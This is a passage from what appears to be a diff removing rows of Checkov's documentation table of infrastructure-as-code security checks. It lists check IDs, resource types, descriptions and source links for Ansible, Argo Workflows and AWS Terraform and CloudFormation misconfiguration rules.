-| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 101 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 
102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) |
-| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 109 | CKV_ANSIBLE_5 | resource | 
[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) |
-| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 127 | CKV_ANSIBLE_6 | resource | 
[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the 
force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not 
used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) |
-| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) |
-| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) |
-| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) |
-| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) |
-| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) |
-| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures 
are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) |
-| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) |
-| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) |
-| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) |
-| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) |
-| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) |
-| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) |
-| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) |
-| 152 | 
CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) |
-| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) |
-| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) |
-| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) |
-| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) |
-| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) |
-| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) |
-| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | 
[ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) |
-| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) |
-| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) |
-| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) |
-| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) |
-| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) |
-| 165 | CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) |
-| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | 
Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) |
-| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) |
-| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) |
-| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) |
-| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) |
-| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) |
-| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | 
[PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) |
-| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) |
-| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) |
-| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) |
-| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) |
-| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) |
-| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) |
-| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | 
[RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) |
-| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) |
-| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) |
-| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) |
-| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) |
-| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) |
-| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) |
-| 186 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | 
[S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) |
-| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) |
-| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
-| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) |
-| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) |
-| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
-| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) |
-| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | 
[SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) |
-| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security groups rule has a 
description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) |
-| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
